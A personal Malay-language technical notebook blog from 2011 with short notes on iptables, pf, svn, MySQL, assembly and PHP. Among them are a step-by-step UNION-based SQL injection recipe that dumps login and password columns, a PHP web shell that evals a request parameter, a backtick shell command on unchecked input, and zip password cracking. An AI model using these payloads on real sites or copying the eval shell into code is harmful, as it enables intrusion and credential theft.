29 December 2011

masalah mysql inet_ntoa

certain version mysql(5.1.41), hasil inet_ntoa tak dipapar dalam format string, sebaliknya sebagai integer.
Data(the bits itself) betul, tapi sebab di print/display as number, membuatkan pengguna keliru.

Penyelesaian:
guna 'CAST ... AS CHAR' seperti di bawah.

SELECT CAST( INET_NTOA( 1965180531 ) AS CHAR)

transparensi dlm gimp

cara nak transparentkan sebahagian dari gambar.
1)create new layer. 'Layer Fill Type' => Transparency
2) salin gambar ke layer baru.
3) Guna Eraser Tool. dan select kawasan yg nak ditransparensi kan

30 November 2011

boot linux dapat grub je


dari grub prompt, larikan arahan di bawah:
set root=(hd0,1)
linux /boot/vmlinux-2.6.38-8-generic root=/dev/sda1 ro
initrd /boot/initrd.img-2.6.38-8-generic
boot

kemudian boot. Lepas boot:

sudo grub-install /dev/sda
sudo update-grub

23 November 2011

iptable

agak kompleks banding dengan pf(bsd).

1) secara default(table filter) rantaian(flow) paket seperti rajah dibawah.

2) arahan
iptables -F   ;# flush semua
iptables -P INPUT DROP -t filter   ;# default policy INPUT adalah DROP dlm tbl filter
iptables -L -t filter ;# list rules dalam table filter
iptables -t filter -A INPUT -s 192.168.117.57/32 -i eth0 -j ACCEPT ;# add dlm chain INPUT tbl filter

iptables-save  > rules.txt ;# boleh pipe ke file (utk restore )
iptables-restore < rules.txt


contoh:
#!/bin/sh
iptables -F INPUT 
iptables -F OUTPUT
iptables -F FORWARD

iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#Permit DNS traffic
iptables -A INPUT -p udp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp --sport 53 -j ACCEPT

#Accept local-network return traffic for clients
iptables -A INPUT -m state -p tcp --dport 1024:65535 --state ESTABLISHED,RELATED -s 192.168.9.0/24 -j ACCEPT
iptables -A OUTPUT -m state -p tcp --dport 1024:65535 ! --state INVALID -d 192.168.9.0/24 -j ACCEPT

#Accept local (192.168.9.0/24) SSH traffics
iptables -A INPUT -m state -p tcp --dport 22 ! --state INVALID -s 192.168.9.0/24 -j ACCEPT
iptables -A OUTPUT -m state -p tcp --sport 22 --state ESTABLISHED,RELATED -d 192.168.9.0/24 -j ACCEPT
Cara baca rules berbeza dengan pf,  bila dah match rules pada line tertentu, tak baca lagi rules yg kat bawah. Sama macam 'quick' dalam pf.

3) nat
   iptables -t nat -A POSTROUTING -o <external-interface> -j MASQUERADE

4) port forwarding
   iptables -t nat -A PREROUTING -p tcp -i <external-interface> --dport <port-num> -j DNAT --to <int_ip>:<port>
contoh 1:
   iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 8080 -j DNAT --to 192.168.9.35:22
contoh 2:
   iptables -t nat -A PREROUTING -i eth0 -j DNAT -d 202.1.1.4 --to 192.168.1.1
  # any packet to 202.1.1.4 will be forward to 192.168.1.1 tanpa disedari(transparent)


5) iptables ada 3 tables
  1. filter: ada 3 chain
    1. FORWARD
    2. INPUT
    3. OUTPUT
  2. nat: ada 3 chain
    1. PREROUTING
    2. POSTROUTING
    3. OUTPUT
  3. mangle (jarang guna, boleh abaikan je)
    1. PREROUTING
    2. POSTROUTING
    3. OUTPUT
    4. INPUT
    5. FORWARD
Rujuk rajah utk lebih detail


22 November 2011

call (assembly)

call dalam asemby setara kepada 2 operasi seperti berikut:

call 0x00401000   => push EIP
                               mov EIP, 0x00401000

02 November 2011

pf firewall


PF(firewall pada openbsd)

pf akan baca semua rules bermula dari atas ke bawah. Rules yg di baca kemudian(di bawah) akan mengatasi(overwrite) rules yg awal.

contoh:


block in on em0
pass in on em0 from 10.0.1.0/24
keterangan:
mula dengan default block. Kemudian benarkan jika paket asal dari ip 10.0.1.0/24


block in on em0
block in quick on em0 from 10.0.1.34
pass in on em0 from 10.0.1.0/24
keterangan:
sebab ada 'quick' pada baris 2: Jika asal paket adalah 10.0.1.34, terus drop paket tu. tak perlu lagi semak rules yg kat bawah.




ref:http://openbsd.com/faq/pf/filter.html#pass

19 October 2011

cucukan sql


1) nak tentukan bilangan field
order by 6-- >> masih kluar normal page
order by 7-- >> page dah tak normal

2) nak tahu field yang berkenaan
union select 1,2,3,4,5,6--   >> akan kluar '5'

3) nak dapat version
union select 1,2,3,4,version(),6--

4) dapatkan senarai table
union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=[databasename]

5) dapatkan senarai nama field
union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=[tablename]


6) dapatkan maklumat tertentu
union select 1,2,3,4,concat_ws(0x3a,login,password),6 from users
output>> login.password

11 October 2011

windows route


route ADD 10.10.10.0 MASK 255.255.255.0 192.168.2.13

kekal walau reboot
route -p ADD 10.10.10.0 MASK 255.255.255.0 192.168.2.13

03 October 2011

diff svn

diff -U 3 -H -d -r -N cronjob_lama/svn-commit.tmp cronjob/svn-commit.tmp

08 September 2011

sambung download scp

kombinasi rsyn dan ssh:

rsync --rsh='ssh' -av --progress --partial 10.0.0.12:/home/siperdana/fileDownload.tar.gz /path/to/lokasi/

Kurangkan penggunaan harddisk oleh Thunderbird

Walaupun dah delete email, saiz dalam harrdisk masih tak berkurang. Perlu runkan File-> Compact_Folder.

Keterangan: Walau file dah delete, email tersebut masih belum di buang dalam file berkenaan, cuma di hidekan saja dari pengguna. Bila run compact_folder, thunderbird akan delete sebenar-benarnya dari fail yang berkenaan.

thunderbird 3.1

18 August 2011

Teka OS dari jauh

nmap -O -v siperdana.blog.com

Device type: WAP
Running: Linux 2.4.X
OS details: DD-WRT v23 (Linux 2.4.36)
Uptime guess: 32.007 days (since Sun Jul 17 11:13:34 2011)
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros


nmap -sT -p0 siperdana.blog.com

Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-18 11:19 MYT
Nmap scan report for siperdana.com.my (74.51.218.240)
Host is up (0.28s latency).
rDNS record for 74.51.218.240: f0.76.344a.static.theplanet.com
Not shown: 967 closed ports
PORT     STATE    SERVICE
1/tcp    filtered tcpmux
3/tcp    filtered compressnet
4/tcp    filtered unknown
6/tcp    filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds



05 August 2011

Network tools

netstat -punat

lsof -i :80   ; semak port


nmap -sT -p 1-65535 10.0.0.1;  test port 1 hingga 65535



scan subnet
nmap -v -sP 192.168.1.0/24 |grep -B1 up

enigmail utk thunderbird 3.1

link utk versi yg serasi dengan thunderbird 3.1
http://enigmail.mozdev.org/download/download-static.php.html

enigmail 1.2 hnaya sesuai utk thunderbird 5.0 ke atas

workstation 6.5.5 tak boleh compile atas kernel 2.6.38 (natty)


1) 

cd /usr/lib/vmware/modules/source
tar xf file berikut(vmci.tar, vmmon.tar, vmnet.tar, vsock.tar)
buat backup semua file .tar di atas.


2)
applykan patch berikut: http://communities.vmware.com/servlet/JiveServlet/download/1721070-60934/2.6.37.1-1.2_6.5.5.patch
compress balik kod yg dah dipatch dalam .tar masing-masing.


3)
run: vmware-modconfig --console --install-all




ref: 
http://communities.vmware.com/message/1721070#1721070

06 July 2011

/etc/network/interfaces

Arahan Tambahan dalam interfaces

# The loopback network interface
auto lo
auto eth0
iface lo inet loopback
iface eth0 inet static
address 192.168.0.14
netmask 255.255.255.0
broadcast 192.168.0.255
network 192.168.0.0
gateway 192.168.0.1
post-up iptables-restore < /etc/iptables.up.rules

auto eth1
iface eth1 inet static
address 10.0.1.190
netmask 255.255.255.0
broadcast 10.0.1.255
network 10.0.1.0
hwaddress ether 00:0c:29:13:db:26
up route add -net 10.0.110.0/24 gw 10.0.1.254

up route add -net 10.0.14.0/24 gw 10.0.1.254
up route add -net 22.30.3.0/24 gw 10.0.1.254

01 July 2011

carian gmail

label:inbox label:unread after:2011/05/15 before:2011/06/29


>> cari dalam inbox, yg belum baca, tarikh antara 15 May - 29 Jun  2011

24 June 2011

Samba

# smbclient -L 192.168.1.2 -U muridin
Enter muridin's password:

Domain=[BIOLOGY] OS=[Unix] Server=[Samba 2.2.2]

 Sharename      Type      Comment
 ---------      ----      -------
 public         Disk      Public Stuff
 classes        Disk      Course folders
 website        Disk      Biology Life Sciences website
 win2k          Disk      Windows 2000 installer
 off2k          Disk      Office 2000 installer
 msdata         Disk      Mass Spec Data
 IPC$           IPC       IPC Service (Squirrel Samba Server)
 ADMIN$         Disk      IPC Service (Squirrel Samba Server)
 gonzo          Printer   

#smbmount //10.0.0.1/sharename /mnt/localdir -o username=nama,rw

26 May 2011

openbsd network

openvpn

  • cd /etc/openvpn
  • openvpn client.conf


firewall:

  • pfctl -n -f /etc/pf.conf


network restart

  • sh /etc/netstart em1    (atau)
  • sh /etc/netstart

alias ip
  • cat /etc/hostname.em1

defautl gw :   /etc/mygate


route
  • route show
  • route -n show
  • route -n show -inet
  • netstat -rn
route add:
  • route add -net 192.168.1.0/24 192.168.1.254


24 May 2011

crossover: takleh restore window word


[Manage Bottle]->[ControlPanel]->[WineConfiguration]->[LaunchedSelectedItems]->[Graphics]
Uncheck Below options:
  • Allow the window manager to decorate the windows
  • Allow the window manager to control the windows

19 May 2011

joomla model

1- Joomla framework akan cipta kelas model yang sama nama dengan view, dan membolehkan kelas model tersebut digunakan dalam kelas view.


Dalam /com_sample/view/js/view.html.php
class SampleViewJs extend JView

Dalam /com_sample/models/js.php
class SampleModelJs extend JModel



2- nak call model dari dalam view

$model = &$this->getModel();
$greeting = $model->getGreeting();

16 May 2011

php kod formatter

artikel sebelum ni di hasilkan menggunakan kod php berikut:


<?php

$str 
$argv[1];

$str = ` cat $str;`;
highlight_string($str);
?>


joomla JController->execute()

Joomla JController->execute



<?phpclass kelas{
    function 
papar($var1 "lk"){
        echo 
"kod dalam function papar";  
    }
    function 
execute($task){
        
$this->$task();
    }
}
$objek = new kelas();$objek->execute("papar");
?>

11 May 2011

php variable scope

1) global
<?php
$a = 1;
$b = 2;

function cuba(){
  global $a;
  echo "\$a = $a  \$b = $GLOBALS['b']";
}
?>

2) static
<?php
  function init(){
  static $a;
  $a++
}

05 May 2011

svn propedit

ignoring file(s) in dir
svn propedit svn:ignore dir/

>> dalam mod vi, tukar senarai fail yg nak di abaikan. satu fail satu baris


ps/: kalau guna svn propset, akan overwrite senarai fail yg sebelum.

svn ignore dir

svn propset svn:ignore '*' unwanted_dir/

1)
webcapt/tmp$ svn status
M sessions
? sessions/ruby_sess.20649250e5a2ebfa
? sessions/ruby_sess.34a7003c82eaa928
? sessions/ruby_sess.f8c127b41f2b56ba
? sessions/ruby_sess.a75f05bc662a38ac

2)
webcapt/tmp$ svn propset svn:ignore '*' sessions/
property 'svn:ignore' set on 'sessions'

3)
webcapt/tmp$ svn status
M sessions

4)
webcapt/tmp$ svn commit
"svn-commit.tmp" 4L, 87C written
Sending tmp/sessions
Committed revision 19.

5)
webcapt/tmp$ svn status
[[[no more {? sessions/ruby_sess.34a7003c82eaa928} ]]]

UUID

1)
$ ls /dev/disk/by-uuid/ -alh
total 0
drwxr-xr-x 2 root root 100 2011-05-05 10:15 .
drwxr-xr-x 5 root root 100 2011-05-05 10:15 ..
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 185de63a-3239-494d-993d-25cac74231dd -> ../../sda2
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 1ca70448-5191-43de-b9e0-3ce9dfa14703 -> ../../sda3
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 4c63ea13-039b-4346-b726-0a0cf59ab86e -> ../../sdb1


2)
$sudo blkid
/dev/sda1: TYPE="swap"
/dev/sda2: UUID="185de63a-3239-494d-993d-25cac74231dd" SEC_TYPE="ext2" TYPE="ext3"
/dev/sda3: UUID="1ca70448-5191-43de-b9e0-3ce9dfa14703" SEC_TYPE="ext2" TYPE="ext3"
/dev/sdb1: UUID="4c63ea13-039b-4346-b726-0a0cf59ab86e" TYPE="ext3"


ref: http://ubuntuforums.org/showthread.php?t=1026957

04 May 2011

find dan rm

find ./ -mtime +100 -exec rm -r {} \;

cari dalam ./ file yang berumur lebih dari 100 hari, dan delete.
> +100 : 100 hari dan lebih
> -100 : kurang dari 100 hari
> 100 : exact 100 hari


lain-lain pilihan:
-amin, -atime, -cmin, -ctime, -mmin, and -mtime

c(ctime) > file's status
a > access
m > File's data modified

time > day(24 hours)
min > min


ref:http://www.linuxquestions.org/questions/linux-newbie-8/delete-files-older-than-30-days-using-cronjob-333477/

redmine, webdav - svn

bagaimana webdav semak permisi untuk baca svn


Fail: /usr/lib/perl5/Apache/Redmine.pm:

sub RedmineDSN {
my ($self, $parms, $arg) = @_;
$self->{RedmineDSN} = $arg;
my $query = "SELECT
hashed_password, auth_source_id, permissions
FROM members, projects, users, roles
WHERE
projects.id=members.project_id
AND users.id=members.user_id
AND roles.id=members.role_id
AND users.status=1
AND login=?
AND identifier=? ";
$self->{RedmineQuery} = trim($query);
}


ps:/kena add members dalam project

ref:http://www.redmine.org/projects/redmine/wiki/Repositories_access_control_with_apache_mod_dav_svn_and_mod_perl

03 May 2011

NoMachine Fullscreen

CTRL+Alt+F  full screen


URL: http://www.nomachine.com/ar/view.php?ar_id=AR03C00172

01 May 2011

inline assembly

mingW
#include <stdio.h>

get_sp(int *eip){
asm (
"mov %esp, %eax\n"
"mov 4(%ebp), %ebx\n" // ebx isi eip
"lea 8(%ebp), %ecx\n"
"mov (%ecx), %ecx\n"
"mov %ebx, (%ecx)\n"
);
}
void main(){
int x = 5;
asm( "int3");
printf ("StackPointer (ESP): 0x%x\n", get_sp(&x));
printf ("EIP: 0x%x\n", x);
}



cl (visual studio)
#include <stdio.h>

get_sp(int *eip){
__asm{ 
mov eax, esp
mov ebx, [ebp+4]
lea ecx,[ebp+8]
mov ecx, [ecx]
mov [ecx], ebx
}
}
void main(){
int x = 5;
__asm {int 3};
printf ("StackPointer (ESP): 0x%x\n", get_sp(&x));
printf ("EIP: 0x%x\n", x);
}

29 April 2011

char array vs char pointer

char j2[100] = "adam:Aku darah anak malaysia";
char *j3;

j3 = j2 ;
printf("&j2=%p j2=%p\n",&j2, j2);
printf("&j3=%p  j3=%x\n", &j3, j3);


>>:

&j2=0x7fff1b810fc0 j2=0x7fff1b810fc0
&j3=0x7fff1b810fb8  j3=1b810fc0



#di compile dan run atas 64bit OS.
&j2 sama dgn j2 dan j3.
&j3 adalah lokasi dimana alamat j2 disimpan.

28 April 2011

string.h (c)

1) strcmp
bil = strcmp(char *strA, char *strB);
if (bil == 0){
>> strA = strB
}



2) strstr
char *s1 = "amanamanam";
char *s2 = "ana";
char *s3;

s3 = strstr(s1, s2);
printf("%p - %p = %f\n",s3, s1, (double)(s3 - s1));
>>>>0x40085e - 0x40085c = 2.000000

26 April 2011

bit, byte, word

1nible = 4 bit
1byte = 8 bit
1word = 2 byte = 16 bit
1dword = 4byte = 32 bit


ps:/ setiap alamat dalam memory boleh isi 8 bit

retn

retn >> pop eip

retn 10 >> pop eip,
           >> add esp,10h

Contoh:
1-Mula seperti dibawah.

Sebelum RETN 14 (alamat 76E0BFA9), ESP = 001BFA18. 
RET 14 >>
- POP EIP
- ADD ESP 14




2- Hasilnya, perubahan berlaku pada EIP dan ESP.
- POP EIP akan menyebabkan ESP bertukar kepada 001BFA1C. 
- SUB ESP, 14 >>  ESP = 001BFA1C + 14 = 001BFA30
seperti dibawah:

25 April 2011

jump if overflow

assembly:
jo > jump if overflow

Tapi ni bukan stack overflow. Dia rujuk kepada flag overflow(O) kat CPU.
Flag ni aktif kalau hasil kira2 terakhir, nilainya terlalu besar utk simpan dalam register.


[false alarm.]

mysql create user

GRANT ALL PRIVILEGES ON `dbName`.* TO 'mysqluser'@'localhost' WITH GRANT OPTION ;



Detail:
CREATE USER 'new-username'@'localhost' IDENTIFIED BY 'new-password';
GRANT ALL ON *.* TO 'new-username'@'localhost' WITH GRANT OPTION;



There is a list of privileges that you can grant to a user:
PrivilegeMeaning
ALL [PRIVILEGES]Sets all simple privileges except GRANT OPTION
ALTEREnables use of ALTER TABLE
CREATEEnables use of CREATE TABLE
CREATE TEMPORARY TABLESEnables use of CREATE TEMPORARY TABLE
DELETEEnables use of DELETE
DROPEnables use of DROP TABLE
EXECUTENot implemented
FILEEnables use of SELECT … INTO OUTFILE and LOAD DATA INFILE
INDEXEnables use of CREATE INDEX and DROP INDEX
INSERTEnables use of INSERT
LOCK TABLESEnables use of LOCK TABLES on tables for which you have the SELECT privilege
PROCESSEnables the user to see all processes with SHOW PROCESSLIST
REFERENCESNot implemented
RELOADEnables use of FLUSH
REPLICATION CLIENTEnables the user to ask where slave or master servers are
REPLICATION SLAVENeeded for replication slaves (to read binary log events from the master)
SELECTEnables use of SELECT
SHOW DATABASESSHOW DATABASES shows all databases
SHUTDOWNEnables use of MySQLadmin shutdown
SUPEREnables use of CHANGE MASTER, KILL, PURGE MASTER LOGS, and SET GLOBAL statements, the MySQLadmin debug command; allows you to connect (once) even if max_connections is reached
UPDATEEnables use of UPDATE
USAGESynonym for “no privileges”
GRANT OPTIONEnables privileges to be granted


ref: http://stuntsnippets.com/mysql-create-new-user/

22 April 2011

pyHook

Cara nak guna pyHook dalam Immunity Debugger

1- Simpan kod di bawah dalam dir ~pathToImmunityDebugger\PyCommands\mhcubaHook.py
mhcubaHook.py

  • line 17-18: nama hook mesti berlainan.


2- Buka Immunity Debugger dan File->Open sebarang fail exe.

3- Taip !mhcubaHook  dan [enter] dalam command box(pada bahagian bawah I.D. Akan dapati warna latar pada alamat 00401012 bertukar warna pink. Ini kerana arahan 'myhook.add(alamat)' .

4- Tekan butang F9(atau Debug->Run)

5- Klik menu Window-Log utk lihat hasilnya

21 April 2011

recover delete file

sudo dd if=/dev/mmcblk0p1 of=myCard.img bs=512

photorec myCard.img

ref: http://goinggnu.wordpress.com/2008/02/14/recover-deleted-files-from-memory-card/

20 April 2011

select into outfile


SELECT * INTO OUTFILE "/backup/books/allbooks.txt"
FIELDS TERMINATED BY '\t' LINES TERMINATED BY '\n'
FROM books;

ref:
http://www.mysqlfaqs.net/mysql-faqs/Data-Back-Up/Export-Data/How-to-use-SELECT-INTO-OUTFILE-statement-to-export-data

mysqldump tanpa lock tables

mysqldump --lock-tables=false  -h komar.asia -u nama -ppassword database  > namaTable.sql

save mms stream

http://forum.videohelp.com/threads/257045-How-to-record-streaming-WMV-ASF-MMS-links-using-VLC-Media-Player

18 April 2011

reset joomla 1.6 admin password

ganti field password kepada:
 d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199


seterusnya, login guna password secret.

15 April 2011

masalah codec libraray

tiba-tiba media player(vlc) tak support byk format. avidemux pun sama, format yg di suppoprt menjadi kurang.

kat bawah ni cara nak selesaikan masalah.

---------------------------------------
I just solved my vlc video problems. It appears that the culprit was the getdeb repository that I had recently added. I commented out that repo and downgraded several packages - libavcodec-extra-52, libavdevice-extra-52 etc. The most important one seems to be libva1.

In case anyone needs detailed version information for some packages, I will be happy to post.


----------------------------
Open synaptic, search ffmpeg, and remove all installed ffmpeg libraires, starting with libavcodec* down to libswscale*

You'll lose some players and a plugin or 2, no matter, they can be reinstalled. (in synaptic, file -> history will show you

Then install some players and libxine1-ffmpeg and see.


ref:http://ubuntuforums.org/archive/index.php/t-1544929.html

pfctl bsd

susah betul nak ingat BSD ni.

pfctl -n -f /etc/pf.conf

cmp, jl, jg

cmp eax,5
bermaksud: eax - 5


mv eax, 4
cmp eax, 5
; > je -> tak
; > jl -> ya
; > jg -> tak

mv eax, 4
cmp eax, 4
; > je -> ya
; > jl -> tak
; > jg -> tak

mv eax, 4
cmp eax, 3
; > je -> tak
; > jl -> tak
; > jg -> ya


Flag Register
Bit 6: Zero -->> kalau cmp 5,5 -->> Z flag = 1
Bit 7: Sign -->> negatif sign, kalau cmp 1,2 -->>flag = 1

14 April 2011

print poster atas kertas a4

ubuntu$ pdfposter -s 1  asal.pdf baru.pdf

asal.pdf adalah fail yg bersaiz besar, cuma satu muka surat.
baru.pdf fail saiz a4, tapi banyak muka surat.

print baru.pdf dan sambungkan kertas a4 menjadi poster yg besar

mencari ROP(return-oriented programming)

1- berhenti bila jumpa 'retn'
2- kalau 20 nilai teratas pada stack menunjuk kepada executable area dalam memori, besar kemungkinan ada ROP attempt.

teknik baru rfi

 
<?php
if(isset($_REQUEST["code_str"])){
eval(stripslashes($_REQUEST["code_str"]));
} else {
exit(999 * 4 . " The Roof Is On Fire");
}
?>

13 April 2011

pin what???

rasanya pin(http://www.pintool.org/) ni boleh ganti hooking.

Contoh penggunaan adalah utk log kan setiap arahan opcode yg process jalankan.

Satu lagi alternatif ialah DynamoRIO(http://groups.csail.mit.edu/cag/dynamorio/)


ref: http://blog.zynamics.com/2010/07/28/dumping-shellcode-with-pin/

tebuk fail zip guna fcrackzip

$ zip --encrypt -r secret secret/
(creating secret.zip)


$ fcrackzip -u -c a -p aaaaa secret.zip
PASSWORD FOUND!!!!: pw == linux







ref http://linuxers.org/article/how-crack-zip-file-passwords-linux-using-fcrackzip

12 April 2011

setiap alamat ada 8 bit

setiap alamat dalam memori boleh isi 8 bit.

eg:
alamat            nilai(dlm hexadecimal)
---------------   -------------
0x00102000: 41 44
0x00102001: 41 20
0x00102002: 42 41  43 41
0x00102004: 00

  • [1- for dummies: kenapa 0x00102003 tiada kat atas?]
  • [2- kalau char * str = 0x102000, printf("%s", str) dapat apa? ]



4 bit  boleh simpan 16 nilai berbeza
dlm hexadecimal    0x0 - 0xF

8 bit(1 byte) >> 0x00 - 0xFF

11 April 2011

cmp (opcode)

cmp eax, ebx
>>
eax - ebx = y
kalau y == 0, ZF = 1 (True)
kalau y !=0,  ZF = 0 (False)

Assembly Leave Retn

LEAVE =>  POP EBP

RETN =>  POP EIP

VirtualProtect

Dalam Immunity Debugger-> Memory Map

Asal
Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=R E
 Initial access=RWE



Call Virtual Protect API
0040F253  |. 50             PUSH EAX                                          ; /pOldProtect
0040F254  |. 6A 40          PUSH 40                                           ; |NewProtect = PAGE_EXECUTE_READWRITE
0040F256  |. 52             PUSH EDX                                          ; |Size
0040F257  |. 68 00104000    PUSH setup279.00401000                            ; |Address = setup279.00401000
0040F25C  |. E8 1F000000    CALL <JMP.&kernel32.VirtualProtect>               ; \VirtualProtect


 Result

Memory map, item 13
 Address=00401000
 Size=0000F000 (61440.)
 Owner=setup279 00400000
 Section=.text
 Contains=code
 Type=Imag 01001002
 Access=RWE CopyOnWr
 Initial access=RWE


Perubahan pada field Access, dari [R E]  kepada [RWE CopyOnWr]

07 April 2011

Bismillah

Dimulakan dengan nama Allah yang Maha Pemurah dan Maha Mengasihani.
Serta selawat dan salam untuk nabi Muhammad(SAW)